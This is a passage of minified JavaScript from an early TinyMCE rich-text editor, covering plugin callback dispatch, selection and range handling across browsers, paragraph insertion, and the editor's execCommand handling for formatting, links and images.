eval('TinyMCE_'+tinyMCE.settings['theme']+"_getControlHTML"+"('"+control_name+"');");};TinyMCE.prototype._themeExecCommand=function(editor_id,element,command,user_interface,value){var themePlugins=tinyMCE.getParam('plugins','',true,',');var templateFunction;for(var i=themePlugins.length;i>=0;i--){templateFunction='TinyMCE_'+themePlugins[i]+"_execCommand";if(eval("typeof("+templateFunction+")")!='undefined'){if(eval(templateFunction+"(editor_id, element, command, user_interface, value);"))return true;}}templateFunction='TinyMCE_'+tinyMCE.settings['theme']+"_execCommand";if(eval("typeof("+templateFunction+")")!='undefined')return eval(templateFunction+"(editor_id, element, command, user_interface, value);");return false;};TinyMCE.prototype._getThemeFunction=function(suffix,skip_plugins){if(skip_plugins)return 'TinyMCE_'+tinyMCE.settings['theme']+suffix;var themePlugins=tinyMCE.getParam('plugins','',true,',');var templateFunction;for(var i=themePlugins.length;i>=0;i--){templateFunction='TinyMCE_'+themePlugins[i]+suffix;if(eval("typeof("+templateFunction+")")!='undefined')return templateFunction;}return 'TinyMCE_'+tinyMCE.settings['theme']+suffix;};TinyMCE.prototype.isFunc=function(func_name){if(func_name==null||func_name=="")return false;return eval("typeof("+func_name+")")!="undefined";};TinyMCE.prototype.exec=function(func_name,args){var str=func_name+'(';for(var i=3;i<args.length;i++){str+='args['+i+']';if(i<args.length-1)str+=',';}str+=');';return eval(str);};TinyMCE.prototype.executeCallback=function(param,suffix,mode){switch(mode){case 0:var state=false;var plugins=tinyMCE.getParam('plugins','',true,',');for(var i=0;i<plugins.length;i++){var func="TinyMCE_"+plugins[i]+suffix;if(tinyMCE.isFunc(func)){tinyMCE.exec(func,this.executeCallback.arguments);state=true;}}var func='TinyMCE_'+tinyMCE.settings['theme']+suffix;if(tinyMCE.isFunc(func)){tinyMCE.exec(func,this.executeCallback.arguments);state=true;}var func=tinyMCE.getParam(param,'');if(tinyMCE.isFunc(func)){tinyMCE.exec(func,this.executeCallback.arguments);state=true;}return state;case 1:var plugins=tinyMCE.getParam('plugins','',true,',');for(var i=0;i<plugins.length;i++){var func="TinyMCE_"+plugins[i]+suffix;if(tinyMCE.isFunc(func)){if(tinyMCE.exec(func,this.executeCallback.arguments))return true;}}var func='TinyMCE_'+tinyMCE.settings['theme']+suffix;if(tinyMCE.isFunc(func)){if(tinyMCE.exec(func,this.executeCallback.arguments))return true;}var func=tinyMCE.getParam(param,'');if(tinyMCE.isFunc(func)){if(tinyMCE.exec(func,this.executeCallback.arguments))return true;}return false;}};TinyMCE.prototype.debug=function(){var msg="";var elm=document.getElementById("tinymce_debug");if(!elm){var debugDiv=document.createElement("div");debugDiv.setAttribute("className","debugger");debugDiv.className="debugger";debugDiv.innerHTML='\
			Debug output:\
			<textarea id="tinymce_debug" style="width: 100%; height: 300px" wrap="nowrap"></textarea>';document.body.appendChild(debugDiv);elm=document.getElementById("tinymce_debug");}var args=this.debug.arguments;for(var i=0;i<args.length;i++){msg+=args[i];if(i<args.length-1)msg+=', ';}elm.value+=msg+"\n";};function TinyMCEControl(settings){this.undoLevels=new Array();this.undoIndex=0;this.typingUndoIndex=-1;this.undoRedo=true;this.isTinyMCEControl=true;this.settings=settings;this.settings['theme']=tinyMCE.getParam("theme","default");this.settings['width']=tinyMCE.getParam("width",-1);this.settings['height']=tinyMCE.getParam("height",-1);};TinyMCEControl.prototype.repaint=function(){if(tinyMCE.isMSIE)return;this.getBody().style.display='none';this.getBody().style.display='block';};TinyMCEControl.prototype.switchSettings=function(){if(tinyMCE.configs.length>1&&tinyMCE.currentConfig!=this.settings['index']){tinyMCE.settings=this.settings;tinyMCE.currentConfig=this.settings['index'];}};TinyMCEControl.prototype.fixBrokenURLs=function(){var body=this.getBody();var elms=body.getElementsByTagName("img");for(var i=0;i<elms.length;i++){var src=elms[i].getAttribute('mce_real_src');if(src&&src!="")elms[i].setAttribute("src",src);}var elms=body.getElementsByTagName("a");for(var i=0;i<elms.length;i++){var href=elms[i].getAttribute('mce_real_href');if(href&&href!="")elms[i].setAttribute("href",href);}};TinyMCEControl.prototype.convertAllRelativeURLs=function(){var body=this.getBody();var elms=body.getElementsByTagName("img");for(var i=0;i<elms.length;i++){var src=elms[i].getAttribute('src');if(src&&src!=""){src=tinyMCE.convertRelativeToAbsoluteURL(tinyMCE.settings['base_href'],src);elms[i].setAttribute("src",src);elms[i].setAttribute("mce_real_src",src);}}var elms=body.getElementsByTagName("a");for(var i=0;i<elms.length;i++){var href=elms[i].getAttribute('href');if(href&&href!=""){href=tinyMCE.convertRelativeToAbsoluteURL(tinyMCE.settings['base_href'],href);elms[i].setAttribute("href",href);elms[i].setAttribute("mce_real_href",href);}}};TinyMCEControl.prototype.getSelectedHTML=function(){if(tinyMCE.isSafari){return this.getRng().toString();}var elm=document.createElement("body");if(tinyMCE.isGecko)elm.appendChild(this.getRng().cloneContents());else elm.innerHTML=this.getRng().htmlText;return tinyMCE._cleanupHTML(this,this.contentDocument,this.settings,elm,this.visualAid);};TinyMCEControl.prototype.getBookmark=function(){var rng=this.getRng();if(tinyMCE.isSafari)return rng;if(tinyMCE.isMSIE)return rng;if(tinyMCE.isGecko)return rng.cloneRange();return null;};TinyMCEControl.prototype.moveToBookmark=function(bookmark){if(tinyMCE.isSafari){var sel=this.getSel().realSelection;sel.setBaseAndExtent(bookmark.startContainer,bookmark.startOffset,bookmark.endContainer,bookmark.endOffset);return true;}if(tinyMCE.isMSIE)return bookmark.select();if(tinyMCE.isGecko){var rng=this.getDoc().createRange();var sel=this.getSel();rng.setStart(bookmark.startContainer,bookmark.startOffset);rng.setEnd(bookmark.endContainer,bookmark.endOffset);sel.removeAllRanges();sel.addRange(rng);return true;}return false;};TinyMCEControl.prototype.getSelectedText=function(){if(tinyMCE.isMSIE){var doc=this.getDoc();if(doc.selection.type=="Text"){var rng=doc.selection.createRange();selectedText=rng.text;}else selectedText='';}else{var sel=this.getSel();if(sel&&sel.toString)selectedText=sel.toString();else selectedText='';}return selectedText;};TinyMCEControl.prototype.selectNode=function(node,collapse,select_text_node,to_start){if(!node)return;if(typeof(collapse)=="undefined")collapse=true;if(typeof(select_text_node)=="undefined")select_text_node=false;if(typeof(to_start)=="undefined")to_start=true;if(tinyMCE.isMSIE){var rng=this.getBody().createTextRange();try{rng.moveToElementText(node);if(collapse)rng.collapse(to_start);rng.select();}catch(e){}}else{var sel=this.getSel();if(!sel)return;if(tinyMCE.isSafari){sel.realSelection.setBaseAndExtent(node,0,node,node.innerText.length);if(collapse){if(to_start)sel.realSelection.collapseToStart();else sel.realSelection.collapseToEnd();}this.scrollToNode(node);return;}var rng=this.getDoc().createRange();if(select_text_node){var nodes=tinyMCE.getNodeTree(node,new Array(),3);if(nodes.length>0)rng.selectNodeContents(nodes[0]);else rng.selectNodeContents(node);}else rng.selectNode(node);if(collapse){if(!to_start&&node.nodeType==3){rng.setStart(node,node.nodeValue.length);rng.setEnd(node,node.nodeValue.length);}else rng.collapse(to_start);}sel.removeAllRanges();sel.addRange(rng);}this.scrollToNode(node);tinyMCE.selectedElement=null;if(node.nodeType==1)tinyMCE.selectedElement=node;};TinyMCEControl.prototype.scrollToNode=function(node){var pos=tinyMCE.getAbsPosition(node);var doc=this.getDoc();var scrollX=doc.body.scrollLeft+doc.documentElement.scrollLeft;var scrollY=doc.body.scrollTop+doc.documentElement.scrollTop;var height=tinyMCE.isMSIE?document.getElementById(this.editorId).style.pixelHeight:this.targetElement.clientHeight;if(!tinyMCE.settings['auto_resize']&&!(pos.absTop>scrollY&&pos.absTop<(scrollY-25+height)))this.contentWindow.scrollTo(pos.absLeft,pos.absTop-height+25);};TinyMCEControl.prototype.getBody=function(){return this.getDoc().body;};TinyMCEControl.prototype.getDoc=function(){return this.contentWindow.document;};TinyMCEControl.prototype.getWin=function(){return this.contentWindow;};TinyMCEControl.prototype.getSel=function(){if(tinyMCE.isMSIE&&!tinyMCE.isOpera)return this.getDoc().selection;var sel=this.contentWindow.getSelection();if(tinyMCE.isSafari&&!sel.getRangeAt){var newSel=new Object();var doc=this.getDoc();function getRangeAt(idx){var rng=new Object();rng.startContainer=this.focusNode;rng.endContainer=this.anchorNode;rng.commonAncestorContainer=this.focusNode;rng.createContextualFragment=function(html){if(html.charAt(0)=='<'){var elm=doc.createElement("div");elm.innerHTML=html;return elm.firstChild;}return doc.createTextNode("UNSUPPORTED, DUE TO LIMITATIONS IN SAFARI!");};rng.deleteContents=function(){doc.execCommand("Delete",false,"");};return rng;}newSel.focusNode=sel.baseNode;newSel.focusOffset=sel.baseOffset;newSel.anchorNode=sel.extentNode;newSel.anchorOffset=sel.extentOffset;newSel.getRangeAt=getRangeAt;newSel.text=""+sel;newSel.realSelection=sel;newSel.toString=function(){return this.text;};return newSel;}return sel;};TinyMCEControl.prototype.getRng=function(){var sel=this.getSel();if(sel==null)return null;if(tinyMCE.isMSIE&&!tinyMCE.isOpera)return sel.createRange();if(tinyMCE.isSafari){var rng=this.getDoc().createRange();var sel=this.getSel().realSelection;rng.setStart(sel.baseNode,sel.baseOffset);rng.setEnd(sel.extentNode,sel.extentOffset);return rng;}return this.getSel().getRangeAt(0);};TinyMCEControl.prototype._insertPara=function(e){function isEmpty(para){function isEmptyHTML(html){return html.replace(new RegExp('[ \t\r\n]+','g'),'').toLowerCase()=="";}if(para.getElementsByTagName("img").length>0)return false;if(para.getElementsByTagName("table").length>0)return false;if(para.getElementsByTagName("hr").length>0)return false;var nodes=tinyMCE.getNodeTree(para,new Array(),3);for(var i=0;i<nodes.length;i++){if(!isEmptyHTML(nodes[i].nodeValue))return false;}return true;}var doc=this.getDoc();var sel=this.getSel();var win=this.contentWindow;var rng=sel.getRangeAt(0);var body=doc.body;var rootElm=doc.documentElement;var self=this;var blockName="P";var rngBefore=doc.createRange();rngBefore.setStart(sel.anchorNode,sel.anchorOffset);rngBefore.collapse(true);var rngAfter=doc.createRange();rngAfter.setStart(sel.focusNode,sel.focusOffset);rngAfter.collapse(true);var direct=rngBefore.compareBoundaryPoints(rngBefore.START_TO_END,rngAfter)<0;var startNode=direct?sel.anchorNode:sel.focusNode;var startOffset=direct?sel.anchorOffset:sel.focusOffset;var endNode=direct?sel.focusNode:sel.anchorNode;var endOffset=direct?sel.focusOffset:sel.anchorOffset;startNode=startNode.nodeName=="BODY"?startNode.firstChild:startNode;endNode=endNode.nodeName=="BODY"?endNode.firstChild:endNode;var startBlock=tinyMCE.getParentBlockElement(startNode);var endBlock=tinyMCE.getParentBlockElement(endNode);if(startBlock!=null){blockName=startBlock.nodeName;if(blockName=="TD"||blockName=="TABLE"||(blockName=="DIV"&&new RegExp('left|right','gi').test(startBlock.style.cssFloat)))blockName="P";}if(tinyMCE.getParentElement(startBlock,"OL,UL")!=null)return false;if((startBlock!=null&&startBlock.nodeName=="TABLE")||(endBlock!=null&&endBlock.nodeName=="TABLE"))startBlock=endBlock=null;var paraBefore=(startBlock!=null&&startBlock.nodeName==blockName)?startBlock.cloneNode(false):doc.createElement(blockName);var paraAfter=(endBlock!=null&&endBlock.nodeName==blockName)?endBlock.cloneNode(false):doc.createElement(blockName);if(/^(H[1-6])$/.test(blockName))paraAfter=doc.createElement("p");var startChop=startNode;var endChop=endNode;node=startChop;do{if(node==body||node.nodeType==9||tinyMCE.isBlockElement(node))break;startChop=node;}while((node=node.previousSibling?node.previousSibling:node.parentNode));node=endChop;do{if(node==body||node.nodeType==9||tinyMCE.isBlockElement(node))break;endChop=node;}while((node=node.nextSibling?node.nextSibling:node.parentNode));if(startChop.nodeName=="TD")startChop=startChop.firstChild;if(endChop.nodeName=="TD")endChop=endChop.lastChild;if(startBlock==null){rng.deleteContents();sel.removeAllRanges();if(startChop!=rootElm&&endChop!=rootElm){rngBefore=rng.cloneRange();if(startChop==body)rngBefore.setStart(startChop,0);else rngBefore.setStartBefore(startChop);paraBefore.appendChild(rngBefore.cloneContents());if(endChop.parentNode.nodeName==blockName)endChop=endChop.parentNode;rng.setEndAfter(endChop);if(endChop.nodeName!="#text"&&endChop.nodeName!="BODY")rngBefore.setEndAfter(endChop);var contents=rng.cloneContents();if(contents.firstChild&&(contents.firstChild.nodeName==blockName||contents.firstChild.nodeName=="BODY"))paraAfter.innerHTML=contents.firstChild.innerHTML;else paraAfter.appendChild(contents);if(isEmpty(paraBefore))paraBefore.innerHTML="&nbsp;";if(isEmpty(paraAfter))paraAfter.innerHTML="&nbsp;";rng.deleteContents();rngAfter.deleteContents();rngBefore.deleteContents();paraAfter.normalize();rngBefore.insertNode(paraAfter);paraBefore.normalize();rngBefore.insertNode(paraBefore);}else{body.innerHTML="<"+blockName+">&nbsp;</"+blockName+"><"+blockName+">&nbsp;</"+blockName+">";paraAfter=body.childNodes[1];}this.selectNode(paraAfter,true,true);return true;}if(startChop.nodeName==blockName)rngBefore.setStart(startChop,0);else rngBefore.setStartBefore(startChop);rngBefore.setEnd(startNode,startOffset);paraBefore.appendChild(rngBefore.cloneContents());rngAfter.setEndAfter(endChop);rngAfter.setStart(endNode,endOffset);var contents=rngAfter.cloneContents();if(contents.firstChild&&contents.firstChild.nodeName==blockName){paraAfter.innerHTML=contents.firstChild.innerHTML;}else paraAfter.appendChild(contents);if(isEmpty(paraBefore))paraBefore.innerHTML="&nbsp;";if(isEmpty(paraAfter))paraAfter.innerHTML="&nbsp;";var rng=doc.createRange();if(!startChop.previousSibling&&startChop.parentNode.nodeName.toUpperCase()==blockName){rng.setStartBefore(startChop.parentNode);}else{if(rngBefore.startContainer.nodeName.toUpperCase()==blockName&&rngBefore.startOffset==0)rng.setStartBefore(rngBefore.startContainer);else rng.setStart(rngBefore.startContainer,rngBefore.startOffset);}if(!endChop.nextSibling&&endChop.parentNode.nodeName.toUpperCase()==blockName)rng.setEndAfter(endChop.parentNode);else rng.setEnd(rngAfter.endContainer,rngAfter.endOffset);rng.deleteContents();rng.insertNode(paraAfter);rng.insertNode(paraBefore);paraAfter.normalize();paraBefore.normalize();this.selectNode(paraAfter,true,true);return true;};TinyMCEControl.prototype._handleBackSpace=function(evt_type){var doc=this.getDoc();var sel=this.getSel();if(sel==null)return false;var rng=sel.getRangeAt(0);var node=rng.startContainer;var elm=node.nodeType==3?node.parentNode:node;if(node==null)return;if(elm&&elm.nodeName==""){var para=doc.createElement("p");while(elm.firstChild)para.appendChild(elm.firstChild);elm.parentNode.insertBefore(para,elm);elm.parentNode.removeChild(elm);var rng=rng.cloneRange();rng.setStartBefore(node.nextSibling);rng.setEndAfter(node.nextSibling);rng.extractContents();this.selectNode(node.nextSibling,true,true);}var para=tinyMCE.getParentBlockElement(node);if(para!=null&&para.nodeName.toLowerCase()=='p'&&evt_type=="keypress"){var htm=para.innerHTML;var block=tinyMCE.getParentBlockElement(node);if(htm==""||htm=="&nbsp;"||block.nodeName.toLowerCase()=="li"){var prevElm=para.previousSibling;while(prevElm!=null&&prevElm.nodeType!=1)prevElm=prevElm.previousSibling;if(prevElm==null)return false;var nodes=tinyMCE.getNodeTree(prevElm,new Array(),3);var lastTextNode=nodes.length==0?null:nodes[nodes.length-1];if(lastTextNode!=null)this.selectNode(lastTextNode,true,false,false);para.parentNode.removeChild(para);return true;}}return false;};TinyMCEControl.prototype._insertSpace=function(){return true;};TinyMCEControl.prototype.autoResetDesignMode=function(){if(!tinyMCE.isMSIE&&tinyMCE.settings['auto_reset_designmode']){var sel=this.getSel();if(!sel||!sel.rangeCount||sel.rangeCount==0)eval('try { this.getDoc().designMode = "On"; } catch(e) {}');}};TinyMCEControl.prototype.isDirty=function(){return this.startContent!=tinyMCE.trim(this.getBody().innerHTML)&&!tinyMCE.isNotDirty;};TinyMCEControl.prototype._mergeElements=function(scmd,pa,ch,override){if(scmd=="removeformat"){pa.className="";pa.style.cssText="";ch.className="";ch.style.cssText="";return;}var st=tinyMCE.parseStyle(tinyMCE.getAttrib(pa,"style"));var stc=tinyMCE.parseStyle(tinyMCE.getAttrib(ch,"style"));var className=tinyMCE.getAttrib(pa,"class");className+=" "+tinyMCE.getAttrib(ch,"class");if(override){for(var n in st){if(typeof(st[n])=='function')continue;stc[n]=st[n];}}else{for(var n in stc){if(typeof(stc[n])=='function')continue;st[n]=stc[n];}}tinyMCE.setAttrib(pa,"style",tinyMCE.serializeStyle(st));tinyMCE.setAttrib(pa,"class",tinyMCE.trim(className));ch.className="";ch.style.cssText="";ch.removeAttribute("class");ch.removeAttribute("style");};TinyMCEControl.prototype.setUseCSS=function(b){var doc=this.getDoc();try{doc.execCommand("useCSS",false,!b);}catch(ex){}try{doc.execCommand("styleWithCSS",false,b);}catch(ex){}};TinyMCEControl.prototype.execCommand=function(command,user_interface,value){var doc=this.getDoc();var win=this.getWin();var focusElm=this.getFocusElement();if(this.lastSafariSelection&&!new RegExp('mceStartTyping|mceEndTyping|mceBeginUndoLevel|mceEndUndoLevel|mceAddUndoLevel','gi').test(command)){this.moveToBookmark(this.lastSafariSelection);tinyMCE.selectedElement=this.lastSafariSelectedElement;}if(!tinyMCE.isMSIE&&!this.useCSS){this.setUseCSS(false);this.useCSS=true;}this.contentDocument=doc;if(tinyMCE._themeExecCommand(this.editorId,this.getBody(),command,user_interface,value))return;if(focusElm&&focusElm.nodeName=="IMG"){var align=focusElm.getAttribute('align');var img=command=="JustifyCenter"?focusElm.cloneNode(false):focusElm;switch(command){case "JustifyLeft":if(align=='left')img.removeAttribute('align');else img.setAttribute('align','left');var div=focusElm.parentNode;if(div&&div.nodeName=="DIV"&&div.childNodes.length==1&&div.parentNode)div.parentNode.replaceChild(img,div);this.selectNode(img);this.repaint();tinyMCE.triggerNodeChange();return;case "JustifyCenter":img.removeAttribute('align');var div=tinyMCE.getParentElement(focusElm,"div");if(div&&div.style.textAlign=="center"){if(div.nodeName=="DIV"&&div.childNodes.length==1&&div.parentNode)div.parentNode.replaceChild(img,div);}else{var div=this.getDoc().createElement("div");div.style.textAlign='center';div.appendChild(img);focusElm.parentNode.replaceChild(div,focusElm);}this.selectNode(img);this.repaint();tinyMCE.triggerNodeChange();return;case "JustifyRight":if(align=='right')img.removeAttribute('align');else img.setAttribute('align','right');var div=focusElm.parentNode;if(div&&div.nodeName=="DIV"&&div.childNodes.length==1&&div.parentNode)div.parentNode.replaceChild(img,div);this.selectNode(img);this.repaint();tinyMCE.triggerNodeChange();return;}}if(tinyMCE.settings['force_br_newlines']){var alignValue="";if(doc.selection.type!="Control"){switch(command){case "JustifyLeft":alignValue="left";break;case "JustifyCenter":alignValue="center";break;case "JustifyFull":alignValue="justify";break;case "JustifyRight":alignValue="right";break;}if(alignValue!=""){var rng=doc.selection.createRange();if((divElm=tinyMCE.getParentElement(rng.parentElement(),"div"))!=null)divElm.setAttribute("align",alignValue);else if(rng.pasteHTML&&rng.htmlText.length>0)rng.pasteHTML('<div align="'+alignValue+'">'+rng.htmlText+"</div>");tinyMCE.triggerNodeChange();return;}}}switch(command){case "mceRepaint":this.repaint();return true;case "mceStoreSelection":this.selectionBookmark=this.getBookmark();return true;case "mceRestoreSelection":this.moveToBookmark(this.selectionBookmark);return true;case "InsertUnorderedList":case "InsertOrderedList":var tag=(command=="InsertUnorderedList")?"ul":"ol";if(tinyMCE.isSafari)this.execCommand("mceInsertContent",false,"<"+tag+"><li>&nbsp;</li><"+tag+">");else this.getDoc().execCommand(command,user_interface,value);tinyMCE.triggerNodeChange();break;case "Strikethrough":if(tinyMCE.isSafari)this.execCommand("mceInsertContent",false,"<strike>"+this.getSelectedHTML()+"</strike>");else this.getDoc().execCommand(command,user_interface,value);tinyMCE.triggerNodeChange();break;case "mceSelectNode":this.selectNode(value);tinyMCE.triggerNodeChange();tinyMCE.selectedNode=value;break;case "FormatBlock":if(value==null||value==""){var elm=tinyMCE.getParentElement(this.getFocusElement(),"p,div,h1,h2,h3,h4,h5,h6,pre,address");if(elm)this.execCommand("mceRemoveNode",false,elm);}else this.getDoc().execCommand("FormatBlock",false,value);tinyMCE.triggerNodeChange();break;case "mceRemoveNode":if(!value)value=tinyMCE.getParentElement(this.getFocusElement());if(tinyMCE.isMSIE){value.outerHTML=value.innerHTML;}else{var rng=value.ownerDocument.createRange();rng.setStartBefore(value);rng.setEndAfter(value);rng.deleteContents();rng.insertNode(rng.createContextualFragment(value.innerHTML));}tinyMCE.triggerNodeChange();break;case "mceSelectNodeDepth":var parentNode=this.getFocusElement();for(var i=0;parentNode;i++){if(parentNode.nodeName.toLowerCase()=="body")break;if(parentNode.nodeName.toLowerCase()=="#text"){i--;parentNode=parentNode.parentNode;continue;}if(i==value){this.selectNode(parentNode,false);tinyMCE.triggerNodeChange();tinyMCE.selectedNode=parentNode;return;}parentNode=parentNode.parentNode;}break;case "SetStyleInfo":var rng=this.getRng();var sel=this.getSel();var scmd=value['command'];var sname=value['name'];var svalue=value['value']==null?'':value['value'];var wrapper=value['wrapper']?value['wrapper']:"span";var parentElm=null;var invalidRe=new RegExp("^BODY|HTML$","g");var invalidParentsRe=tinyMCE.settings['merge_styles_invalid_parents']!=''?new RegExp(tinyMCE.settings['merge_styles_invalid_parents'],"gi"):null;if(tinyMCE.isMSIE){if(rng.item)parentElm=rng.item(0);else{var pelm=rng.parentElement();var prng=doc.selection.createRange();prng.moveToElementText(pelm);if(rng.htmlText==prng.htmlText||rng.boundingWidth==0){if(invalidParentsRe==null||!invalidParentsRe.test(pelm.nodeName))parentElm=pelm;}}}else{var felm=this.getFocusElement();if(sel.isCollapsed||(/td|tr|tbody|table/ig.test(felm.nodeName)&&sel.anchorNode==felm.parentNode))parentElm=felm;}if(parentElm&&!invalidRe.test(parentElm.nodeName)){if(scmd=="setstyle")tinyMCE.setStyleAttrib(parentElm,sname,svalue);if(scmd=="setattrib")tinyMCE.setAttrib(parentElm,sname,svalue);if(scmd=="removeformat"){parentElm.style.cssText='';tinyMCE.setAttrib(parentElm,'class','');}var ch=tinyMCE.getNodeTree(parentElm,new Array(),1);for(var z=0;z<ch.length;z++){if(ch[z]==parentElm)continue;if(scmd=="setstyle")tinyMCE.setStyleAttrib(ch[z],sname,'');if(scmd=="setattrib")tinyMCE.setAttrib(ch[z],sname,'');if(scmd=="removeformat"){ch[z].style.cssText='';tinyMCE.setAttrib(ch[z],'class','');}}}else{doc.execCommand("fontname",false,"#mce_temp_font#");var elementArray=tinyMCE.getElementsByAttributeValue(this.getBody(),"font","face","#mce_temp_font#");for(var x=0;x<elementArray.length;x++){elm=elementArray[x];if(elm){var spanElm=doc.createElement(wrapper);if(scmd=="setstyle")tinyMCE.setStyleAttrib(spanElm,sname,svalue);if(scmd=="setattrib")tinyMCE.setAttrib(spanElm,sname,svalue);if(scmd=="removeformat"){spanElm.style.cssText='';tinyMCE.setAttrib(spanElm,'class','');}if(elm.hasChildNodes()){for(var i=0;i<elm.childNodes.length;i++)spanElm.appendChild(elm.childNodes[i].cloneNode(true));}spanElm.setAttribute("mce_new","true");elm.parentNode.replaceChild(spanElm,elm);var ch=tinyMCE.getNodeTree(spanElm,new Array(),1);for(var z=0;z<ch.length;z++){if(ch[z]==spanElm)continue;if(scmd=="setstyle")tinyMCE.setStyleAttrib(ch[z],sname,'');if(scmd=="setattrib")tinyMCE.setAttrib(ch[z],sname,'');if(scmd=="removeformat"){ch[z].style.cssText='';tinyMCE.setAttrib(ch[z],'class','');}}}}}var nodes=doc.getElementsByTagName(wrapper);for(var i=nodes.length-1;i>=0;i--){var elm=nodes[i];var isNew=tinyMCE.getAttrib(elm,"mce_new")=="true";elm.removeAttribute("mce_new");if(elm.childNodes&&elm.childNodes.length==1&&elm.childNodes[0].nodeType==1){this._mergeElements(scmd,elm,elm.childNodes[0],isNew);continue;}if(elm.parentNode.childNodes.length==1&&!invalidRe.test(elm.nodeName)&&!invalidRe.test(elm.parentNode.nodeName)){if(invalidParentsRe==null||!invalidParentsRe.test(elm.parentNode.nodeName))this._mergeElements(scmd,elm.parentNode,elm,false);}}var nodes=doc.getElementsByTagName(wrapper);for(var i=nodes.length-1;i>=0;i--){var elm=nodes[i];var isEmpty=true;var tmp=doc.createElement("body");tmp.appendChild(elm.cloneNode(false));tmp.innerHTML=tmp.innerHTML.replace(new RegExp('style=""|class=""','gi'),'');if(new RegExp('<span>','gi').test(tmp.innerHTML)){for(var x=0;x<elm.childNodes.length;x++){if(elm.parentNode!=null)elm.parentNode.insertBefore(elm.childNodes[x].cloneNode(true),elm);}elm.parentNode.removeChild(elm);}}if(scmd=="removeformat")tinyMCE.handleVisualAid(this.getBody(),true,this.visualAid,this);tinyMCE.triggerNodeChange();break;case "FontName":this.getDoc().execCommand('FontName',false,value);if(tinyMCE.isGecko)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);return;case "FontSize":this.getDoc().execCommand('FontSize',false,value);if(tinyMCE.isGecko)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);return;case "forecolor":this.getDoc().execCommand('forecolor',false,value);break;case "HiliteColor":if(tinyMCE.isGecko){this.setUseCSS(true);this.getDoc().execCommand('hilitecolor',false,value);this.setUseCSS(false);}else this.getDoc().execCommand('BackColor',false,value);break;case "Cut":case "Copy":case "Paste":var cmdFailed=false;eval('try {this.getDoc().execCommand(command, user_interface, value);} catch (e) {cmdFailed = true;}');if(tinyMCE.isOpera&&cmdFailed)alert('Currently not supported by your browser, use keyboard shortcuts instead.');if(tinyMCE.isGecko&&cmdFailed){if(confirm(tinyMCE.getLang('lang_clipboard_msg')))window.open('http://www.mozilla.org/editor/midasdemo/securityprefs.html','mceExternal');return;}else tinyMCE.triggerNodeChange();break;case "mceSetContent":if(!value)value="";value=tinyMCE._customCleanup(this,"insert_to_editor",value);tinyMCE._setHTML(doc,value);tinyMCE.setInnerHTML(doc.body,tinyMCE._cleanupHTML(this,doc,tinyMCE.settings,doc.body));tinyMCE.handleVisualAid(doc.body,true,this.visualAid,this);tinyMCE._setEventsEnabled(doc.body,false);return true;case "mceLink":var selectedText="";if(tinyMCE.isMSIE){var rng=doc.selection.createRange();selectedText=rng.text;}else selectedText=this.getSel().toString();if(!tinyMCE.linkElement){if((tinyMCE.selectedElement.nodeName.toLowerCase()!="img")&&(selectedText.length<=0))return;}var href="",target="",title="",onclick="",action="insert",style_class="";if(tinyMCE.selectedElement.nodeName.toLowerCase()=="a")tinyMCE.linkElement=tinyMCE.selectedElement;if(tinyMCE.linkElement!=null&&tinyMCE.getAttrib(tinyMCE.linkElement,'href')=="")tinyMCE.linkElement=null;if(tinyMCE.linkElement){href=tinyMCE.getAttrib(tinyMCE.linkElement,'href');target=tinyMCE.getAttrib(tinyMCE.linkElement,'target');title=tinyMCE.getAttrib(tinyMCE.linkElement,'title');onclick=tinyMCE.getAttrib(tinyMCE.linkElement,'onclick');style_class=tinyMCE.getAttrib(tinyMCE.linkElement,'class');if(onclick=="")onclick=tinyMCE.getAttrib(tinyMCE.linkElement,'onclick');onclick=tinyMCE.cleanupEventStr(onclick);mceRealHref=tinyMCE.getAttrib(tinyMCE.linkElement,'mce_real_href');if(mceRealHref!="")href=mceRealHref;href=eval(tinyMCE.settings['urlconverter_callback']+"(href, tinyMCE.linkElement, true);");action="update";}if(this.settings['insertlink_callback']){var returnVal=eval(this.settings['insertlink_callback']+"(href, target, title, onclick, action, style_class);");if(returnVal&&returnVal['href'])tinyMCE.insertLink(returnVal['href'],returnVal['target'],returnVal['title'],returnVal['onclick'],returnVal['style_class']);}else{tinyMCE.openWindow(this.insertLinkTemplate,{href:href,target:target,title:title,onclick:onclick,action:action,className:style_class});}break;case "mceImage":var src="",alt="",border="",hspace="",vspace="",width="",height="",align="";var title="",onmouseover="",onmouseout="",action="insert";var img=tinyMCE.imgElement;if(tinyMCE.selectedElement!=null&&tinyMCE.selectedElement.nodeName.toLowerCase()=="img"){img=tinyMCE.selectedElement;tinyMCE.imgElement=img;}if(img){if(tinyMCE.getAttrib(img,'name').indexOf('mce_')==0)return;src=tinyMCE.getAttrib(img,'src');alt=tinyMCE.getAttrib(img,'alt');if(alt=="")alt=tinyMCE.getAttrib(img,'title');if(tinyMCE.isGecko){var w=img.style.width;if(w!=null&&w!="")img.setAttribute("width",w);var h=img.style.height;if(h!=null&&h!="")img.setAttribute("height",h);}border=tinyMCE.getAttrib(img,'border');hspace=tinyMCE.getAttrib(img,'hspace');vspace=tinyMCE.getAttrib(img,'vspace');width=tinyMCE.getAttrib(img,'width');height=tinyMCE.getAttrib(img,'height');align=tinyMCE.getAttrib(img,'align');onmouseover=tinyMCE.getAttrib(img,'onmouseover');onmouseout=tinyMCE.getAttrib(img,'onmouseout');title=tinyMCE.getAttrib(img,'title');if(tinyMCE.isMSIE){width=img.attributes['width'].specified?width:"";height=img.attributes['height'].specified?height:"";}onmouseover=tinyMCE.getImageSrc(tinyMCE.cleanupEventStr(onmouseover));onmouseout=tinyMCE.getImageSrc(tinyMCE.cleanupEventStr(onmouseout));mceRealSrc=tinyMCE.getAttrib(img,'mce_real_src');if(mceRealSrc!="")src=mceRealSrc;src=eval(tinyMCE.settings['urlconverter_callback']+"(src, img, true);");if(onmouseover!="")onmouseover=eval(tinyMCE.settings['urlconverter_callback']+"(onmouseover, img, true);");if(onmouseout!="")onmouseout=eval(tinyMCE.settings['urlconverter_callback']+"(onmouseout, img, true);");action="update";}if(this.settings['insertimage_callback']){var returnVal=eval(this.settings['insertimage_callback']+"(src, alt, border, hspace, vspace, width, height, align, title, onmouseover, onmouseout, action);");if(returnVal&&returnVal['src'])tinyMCE.insertImage(returnVal['src'],returnVal['alt'],returnVal['border'],returnVal['hspace'],returnVal['vspace'],returnVal['width'],returnVal['height'],returnVal['align'],returnVal['title'],returnVal['onmouseover'],returnVal['onmouseout']);}else tinyMCE.openWindow(this.insertImageTemplate,{src:src,alt:alt,border:border,hspace:hspace,vspace:vspace,width:width,height:height,align:align,title:title,onmouseover:onmouseover,onmouseout:onmouseout,action:action});break;case 